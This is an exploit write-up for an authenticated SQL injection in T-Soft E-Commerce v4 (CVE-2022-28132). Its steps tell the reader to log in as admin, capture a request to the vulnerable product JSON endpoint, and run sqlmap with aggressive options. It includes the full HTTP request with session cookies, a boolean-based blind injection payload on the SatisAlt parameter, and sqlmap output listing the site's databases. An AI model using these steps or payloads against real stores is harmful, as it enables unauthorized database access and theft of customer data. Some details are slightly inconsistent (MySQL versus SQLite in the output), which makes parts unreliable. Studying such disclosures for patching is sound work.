T-Soft E-Commerce 4 SQL Injection

`# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/TW)  
# Software Homepage: https://www.tsoft.com.tr/  
# Version : v4  
# Tested on: Kali Linux  
# Category: WebApp  
# Google Dork: N/A  
# CVE: 2022-28132  
# Date: 18.02.2022  
######## Description ###########################################  
#  
#  
#  
# Step-1: Login as Admin or with privilage user  
# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path  
# Step-3: Capture the request save as .txt  
# Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'  
# Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'  
#  
# Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...  
#   
#  
#  
######## Proof of Concept ########################################  
  
========>>> REQUEST <<<=========  
  
GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=  
&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2  
Host: domain.com  
Cookie: lang=tr; v4=on; nocache=1; [email protected]; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=  
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36  
Sec-Ch-Ua-Platform: "Linux"  
Accept: */*  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://domain.com/srv/admin/products/products-v2/index  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
=============> RESULTS OF THE SQLMAP <==========================  
  
Parameter: SatisAlt (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20  
---  
back-end DBMS: MySQL 5  
available databases [2]:  
[*] d25082_db  
[*] information_schema  
  
[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable  
  
`